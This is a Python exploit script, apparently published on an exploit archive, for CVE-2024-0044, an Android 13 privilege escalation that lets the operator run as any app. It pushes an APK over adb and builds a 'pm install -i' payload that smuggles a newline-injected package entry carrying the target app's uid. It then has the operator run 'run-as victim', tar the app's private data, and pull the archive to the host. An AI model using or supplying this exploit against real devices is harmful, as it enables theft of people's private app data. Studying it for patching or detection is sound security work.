## https://sploitus.com/exploit?id=PACKETSTORM:190588
# Exploit Title: Android 13 - Local Privilege Escalation
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Version: = 13
# Tested on: Win, Ubuntu
# CVE : CVE-2024-0044
import argparse
import subprocess, os
# ANSI SGR escape sequences used to colour console output.
GREEN = "\x1b[32m"  # foreground green
CYAN = "\x1b[36m"  # foreground cyan
BOLD = "\x1b[1m"  # bold / bright intensity
RESET = "\x1b[0m"  # reset all attributes
# Unicode status glyphs printed in front of log lines.
CHECK_MARK = "\N{HEAVY CHECK MARK}"  # U+2714
ERROR_MARK = "\N{HEAVY MULTIPLICATION X}"  # U+2716
class CustomFormatter(argparse.ArgumentDefaultsHelpFormatter,
                      argparse.RawDescriptionHelpFormatter):
    """Help formatter that appends argument defaults to help text and keeps
    the description/epilog exactly as written (no re-wrapping)."""
def display_banner():
    """Print the ASCII-art banner in green and leave the terminal colour set to cyan.

    The function prints and returns None (there is no return statement), so
    its value cannot be used as text -- see the ``epilog=`` argument below.
    """
    print(f'''{GREEN}
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#
{CYAN}''')
# Command-line interface.
# NOTE: display_banner() prints the banner and returns None (it has no return
# statement), so the banner is printed once here, at import time, and the
# parser's epilog is effectively None -- nothing extra is shown on --help.
parser = argparse.ArgumentParser(
    description='CVE-2024-0044: run-as any app ',
    formatter_class=CustomFormatter,
    epilog= display_banner()
)
parser.add_argument("-P", help="package name", required=True)
parser.add_argument("-A", help="apk file path", required=True)
# Parsed at module level: importing this file requires -P and -A on argv,
# and argparse exits the process (SystemExit) on a usage error.
args = parser.parse_args()
package_name = args.P  # also read as a module global by prompt_user_to_run_as()
apk_path = args.A
# Device-side staging directory used for the archive this script pulls back.
_WA_DIR = "/data/local/tmp/wa/"

# Commands run one by one through `adb shell` to create the staging directory,
# pre-create the archive file and make the tree world-writable.
create_extraction_directory_commands = [
    f"mkdir {_WA_DIR}",
    f"touch {_WA_DIR}wa.tar",
    f"chmod -R 0777 {_WA_DIR}",
]

# Host/device paths. The functions further down use literal strings instead
# of these names, so changing them here does not change behaviour.
adb_path = "adb"
remote_file_path = f"{_WA_DIR}wa.tar"
local_file_path = "./wa.tar"
def push_apk(apk_path):
    """Copy the local file *apk_path* to /data/local/tmp/ on the device with `adb push`.

    Returns True when adb exits 0. Returns False when the local file does not
    exist, when adb reports a non-zero exit (its stderr is printed), or when
    any exception is raised while running adb (also printed).
    """
    try:
        if not os.path.isfile(apk_path):
            print(f"Error: APK file '{apk_path}' does not exist.")
            return False

        proc = subprocess.run(
            ["adb", "push", apk_path, "/data/local/tmp/"],
            capture_output=True,
            text=True,
        )
        if proc.returncode:
            print(f"{CYAN}{BOLD}[{ERROR_MARK}] Error: {proc.stderr.strip()}")
            return False

        remote = f"/data/local/tmp/{os.path.basename(apk_path)}"
        print(f"{CYAN}{BOLD}[{CHECK_MARK}] Successfully pushed '{GREEN}{apk_path}{CYAN}' to '{GREEN}{remote}{CYAN}'")
        return True
    except Exception as exc:  # broad on purpose: the original reports and returns False for anything
        print(f"{CYAN}{BOLD}[{ERROR_MARK}] An error occurred: {exc}")
        return False
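def get_app_uid(package_name):
    """Return the uid of the installed package *package_name*, or None.

    Runs `pm list packages -U` on the device and matches the output in Python
    against the ``package:<name> uid:<uid>`` line format. The original piped the
    listing through ``grep {package_name}`` inside a device-side shell string;
    filtering here instead keeps the operator-supplied name out of any shell
    command line and does not depend on grep being present on the device.

    Returns:
        The uid as a string (everything after ``uid:`` on the matching line),
        or None when the package is not listed, adb exits non-zero (stderr is
        printed), or adb cannot be run (the error is printed).
    """
    try:
        result = subprocess.run(
            ["adb", "shell", "pm", "list", "packages", "-U"],
            capture_output=True,
            text=True,
        )
        if result.returncode != 0:
            print(f"{CYAN}{BOLD}[{ERROR_MARK}] Error: {result.stderr.strip()}")
            return None

        # Exact match: the trailing " uid:" keeps "com.foo" from matching "com.foo.bar".
        marker = f"package:{package_name} uid:"
        for line in result.stdout.splitlines():
            if marker in line:
                uid = line.split("uid:")[1].strip()
                print(f"{CYAN}{BOLD}[{CHECK_MARK}] Got the target uid for {GREEN}{package_name}{CYAN} : {GREEN}{uid}{CYAN}")
                return uid
        return None
    except (OSError, subprocess.SubprocessError) as e:
        # OSError covers adb not being on PATH; SubprocessError covers run() failures.
        print(f"{CYAN}{BOLD}[{ERROR_MARK}] An error occurred: {e}")
        return None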
def generate_payload(uid, apk_filename):
    """Write this script's `pm install -i` command sequence for *uid* to ./payload.txt.

    The text is written to 'payload.txt' in the current working directory and
    echoed to the console for the operator to paste into an adb shell; the
    script then continues with prompt_user_for_next_action(). Any exception,
    including one raised from that prompt and the adb commands it triggers, is
    caught here and printed as "An error occurred".
    """
    try:
        # Command text as published for CVE-2024-0044 (uid and APK name substituted).
        payload = f"PAYLOAD=\"@null\nvictim {uid} 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null\"\npm install -i \"$PAYLOAD\" /data/local/tmp/{apk_filename}"
        with open('payload.txt', 'w') as f:
            f.write(payload)
        print(f"{CYAN}{BOLD}[{CHECK_MARK}] Payload generated and saved to : {GREEN}'payload.txt'{CYAN}")
        print(f"{GREEN}{payload}{GREEN}")
        # NOTE(review): the interactive follow-up runs inside this try, so a
        # failure there is reported by the generic handler below.
        prompt_user_for_next_action()
    except Exception as e:
        print(f"{CYAN}{BOLD}[{ERROR_MARK}] An error occurred: {e}")
def prompt_user_for_next_action():
    """Ask the operator whether to continue once the printed command has been run.

    Loops until 'y' (then runs create_extraction_directory_commands through
    run_adb_commands) or 'n' (prints "Exiting.") is entered; any other input
    prints an error and asks again. Input is stripped and lower-cased.
    """
    question = (
        f"{CYAN}{BOLD}Copy the above command in adb shell. After you finish, type "
        f"{GREEN}'y'{CYAN} to continue or {GREEN}'n'{CYAN} to quit: "
    )
    while True:
        answer = input(question).strip().lower()
        if answer == 'y':
            run_adb_commands(create_extraction_directory_commands)
            return
        if answer == 'n':
            print("Exiting.")
            return
        print(f"{CYAN}{BOLD}[{ERROR_MARK}] Invalid input. Please type 'y' to continue or 'n' to quit.")
def prompt_user_to_run_as():
    """Show the run-as/tar commands for the module-level *package_name* and wait for the operator.

    The two commands are re-printed on every iteration. 'y' pulls wa.tar with
    pull_with_progress("wa.tar") and returns; 'n' prints "Exiting." and
    returns; anything else prints an error and repeats.
    """
    commands = f"{GREEN}run-as victim\ntar -cf /data/local/tmp/wa/wa.tar {package_name}{CYAN}"
    question = (
        f"{CYAN}{BOLD}Copy the above commands in adb shell. Wait until the last command "
        f"executes successfully. After you finish, type {GREEN}'y'{CYAN} to continue or "
        f"{GREEN}'n'{CYAN} to quit: "
    )
    while True:
        print(commands)
        answer = input(question).strip().lower()
        if answer == 'y':
            pull_with_progress("wa.tar")
            return
        if answer == 'n':
            print("Exiting.")
            return
        print(f"{CYAN}{BOLD}[{ERROR_MARK}] Invalid input. Please type 'y' to continue or 'n' to quit.")
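def pull_with_progress(filename, device_path="/data/local/tmp/wa/wa.tar"):
    """Stream *device_path* from the device into the local file *filename* with `adb shell cat`.

    A size is queried first with `du -s` and used for a rough percentage that
    is printed on one line while data arrives.

    Args:
        filename: Local path to create/overwrite (opened in binary mode).
        device_path: File on the device to read.

    Raises:
        subprocess.CalledProcessError: if the `du -s` query exits non-zero.
        OSError: if adb cannot be started or the local file cannot be written.
    """
    # NOTE(review): `du -s` reports allocated blocks (typically 1 KiB units),
    # not bytes, so the "bytes" label and the percentage are approximate --
    # verify against the device, or use a byte-exact query (e.g. `stat -c %s`
    # where the device's toybox provides it) if accuracy matters.
    du_output = subprocess.check_output(["adb", "shell", "du -s", device_path])
    filesize = int(du_output.split()[0])
    print(f"{CYAN}{BOLD}[{CHECK_MARK}] Downloading file: {GREEN}(unknown){CYAN} (size: {GREEN}{filesize}{CYAN} bytes)")

    received = 0
    # The context manager waits for adb and closes the pipe even if the local
    # write fails; the original never reaped the child process.
    with open(filename, "wb") as f, subprocess.Popen(
        ["adb", "shell", "cat", device_path], stdout=subprocess.PIPE
    ) as process:
        for chunk in iter(lambda: process.stdout.read(1024), b""):
            received += len(chunk)
            f.write(chunk)
            # Guard the division: an empty file (or unexpected du output) gave
            # ZeroDivisionError in the original.
            percent = int(received / filesize * 100) if filesize else 0
            print(f"Progress:{GREEN}{percent}{CYAN}", end="\r")

    print(f"\n{CYAN}{BOLD}[{CHECK_MARK}] Download complete: {GREEN}(unknown){CYAN}")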
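def run_adb_commands(commands):
    """Run each string in *commands* on the device via `adb shell`, then continue the flow.

    Each command is passed to adb as a single argument instead of being
    interpolated into a host shell line with ``shell=True``, so the host shell
    never interprets it (the device-side shell still receives the same text).
    Successful commands have their stdout echoed; a non-zero exit or a failure
    to start adb prints the error and moves on to the next command. After the
    loop, prompt_user_to_run_as() is called unconditionally.

    Args:
        commands: Iterable of shell command strings to run on the device.
    """
    for command in commands:
        try:
            result = subprocess.run(
                ["adb", "shell", command],
                check=True,
                capture_output=True,
                text=True,
            )
        except subprocess.CalledProcessError as e:
            print(f"{CYAN}{BOLD}[{ERROR_MARK}] Error executing command {GREEN}'{command}'{CYAN}: {e.stderr.strip()}")
        except OSError as e:
            # Without shell=True a missing adb binary surfaces here rather than as exit 127.
            print(f"{CYAN}{BOLD}[{ERROR_MARK}] Error executing command {GREEN}'{command}'{CYAN}: {e}")
        else:
            print(f"{CYAN}{BOLD}[{CHECK_MARK}] Command {GREEN}'{command}'{CYAN} executed successfully: {result.stdout.strip()}")
    prompt_user_to_run_as()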
if __name__ == "__main__":
    try:
        # Only files ending in ".apk" are handled; anything else silently does nothing.
        if apk_path.endswith('.apk'):
            success = push_apk(apk_path)
            if success:
                apk_filename = os.path.basename(apk_path)
                uid = get_app_uid(package_name)
                if uid:
                    generate_payload(uid, apk_filename)
                else:
                    print(f"Could not find UID for the package {package_name}")
            else:
                print(f"Failed to push the APK '{apk_path}'.")
    # NOTE(review): this handler is dead code -- parse_args() already ran at
    # module level above, and argparse reports usage errors via SystemExit,
    # not ArgumentError, so nothing in this block can raise it.
    except argparse.ArgumentError:
        parser.print_help()